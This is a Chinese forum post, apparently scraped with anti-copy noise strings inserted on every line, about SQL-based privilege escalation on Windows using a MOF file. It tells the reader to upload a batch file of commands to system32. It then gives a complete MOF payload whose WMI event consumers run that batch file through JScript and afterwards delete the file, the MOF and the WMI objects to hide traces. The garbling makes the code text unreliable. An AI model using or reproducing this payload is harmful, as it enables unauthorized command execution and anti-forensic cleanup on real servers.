这个sql提权MOF需要运行 system下的文件,不能定义路径。
2 w: h! v! b$ b X0 ~/ S需要将要运行的命令写入到bat上传到system32目录,然后执行。
* j$ R) d2 N2 Z, v
# r! d) w# r5 `; ]( R4 s这个sql提权MOF需要运行 system下的文件,不能定义路径。
1 d. L6 m6 K* V* _" e需要将要运行的命令写入到bat上传到system32目录,然后执行。+ @8 N% M& s; E. l" @8 E! o
7 r* b+ w. B# U0 U( X% Z" I
#pragma
* x. S. E$ B* ^8 U namespace("\\\\.\\root\\cimv2")3 W- h* T" i- {( A
class3 U% b' |! F) J* ]7 J4 R6 v r
MyClass547
7 _$ |* k" t& @) I { [key]. x0 w/ j# Q" q H6 W
string
5 a( L5 E7 L8 ~ Name;
n) n7 W3 w) q* B };
" y* P: U' I% c# ]/ e. G class
2 v% X9 x4 l% v9 F ActiveScriptEventConsumer
! _) g/ i' k v4 ~0 ] J, ~4 j : __EventConsumer { [key]) x3 c& e9 i3 n/ E6 A( i
string3 m$ O; s0 H Q* \
Name; [not_null]
; s9 C! w7 @8 F) O) y1 z string
' [( S$ X+ b9 Q$ i# a ScriptingEngine; string- m& ]9 X0 P; t2 t2 g
ScriptFileName; [template]1 z" M7 @. h% n7 O0 ~, _
string
( O+ @: o) d, F ScriptText; uint32 KillTimeout;
6 v/ b) o; N( @9 P Y }; instance of __Win32Provider as $P {* }' e/ G& d8 }' `$ Q& z
Name
. S4 A {6 G9 ]: J, v4 u =* k) y) n: s4 y+ g; X
"ActiveScriptEventConsumer"; CLSID =
3 C6 z% m Z2 [) z6 W "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";: P/ D5 [* i0 Z- v8 J& S
PerUserInitialization) `2 t9 g/ R4 }8 u$ V
= TRUE;
4 o9 W8 u& R2 {9 z" V$ \- m& b' S }; instance of __EventConsumerProviderRegistration { Provider7 i( d+ f H2 ]) D
= $P; ConsumerClassNames$ H6 ^8 N# A2 K i8 }
=
7 N% T7 x4 o h J0 Q5 c+ i {"ActiveScriptEventConsumer"};
# P) T9 R9 m, `$ p$ s `7 m };
7 q6 y3 d+ M. c. O* k Instance of ActiveScriptEventConsumer7 B# o4 {& j: R& Y
as $cons { Name
# i1 ]% }/ Q; P# B% }$ ^' O8 |' | =
# E( h- b# l7 E "ASEC"; ScriptingEngine! z0 b# B: \1 f
=2 {/ u* ]! j6 Z8 }
"JScript"; ScriptText& s* a+ U% ^) s! t0 u3 B" |) }
=- b4 P2 {% o2 X* G: a
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
1 M' s" k, i# m, I Instance of ActiveScriptEventConsumer$ ~3 v& y- W! B$ v
as $cons2 { Name
" h! r2 z& z' x/ B4 E( Y% }( p =- H% [3 |8 Q9 r) s$ {( J" s/ |
"qndASEC"; ScriptingEngine- f9 m: u5 A$ D3 J7 b( Y
=
7 e' p, N" C5 }' `/ h) k "JScript"; ScriptText0 [) p) y+ g ~& n* h" U
= J1 a" o% @0 B) o# n
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";% P' r6 x6 S6 {4 [9 a- A0 F$ H
}; instance of __EventFilter as $Filt { Name; K1 V' w3 G6 e: y+ K7 A. D# j6 W
=: N* \5 T P4 K$ X7 [$ t
"instfilt"; Query
i, f: y+ ~% D( @$ n =
+ D) h: l* `" I "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage) u& a& R1 V7 l) i* `( ^
=
1 r+ w% M3 R- e: q "WQL"; }; instance of __EventFilter as $Filt2 { Name9 R) [' ~2 | S' J2 |; ^1 d
=5 r. f5 ~9 n9 Z3 l( Z6 \+ ]( {
"qndfilt"; Query
- r- u% h) @- \/ o& \3 v =5 D' ]' i0 R+ c" e8 t
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
! @% M/ x9 ^- P% L+ f$ ]( @1 p; d =
6 ?" K# }7 t0 \8 f9 e8 |: f "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
: A/ g6 p9 P( { = $cons; Filter
' q3 ~' H) o5 D1 E = $Filt;
* [4 z. Q4 t1 \3 n }; instance of __FilterToConsumerBinding as $bind2 { Consumer; h" Y; N; W! z3 r1 y% q
= $cons2; Filter
/ _$ p) b) E. l, ]8 k3 E = $Filt2;
. e) t$ D0 g/ } }; instance of MyClass547+ D5 S! X2 {/ W* n$ T. Q+ ^
as $MyClass { Name4 L( D; B6 J. q) Y8 A
=% j2 z7 @8 J! F' C" }3 c
"ClassConsumer";
?# B; s( a$ q+ y8 T; X6 Q }; |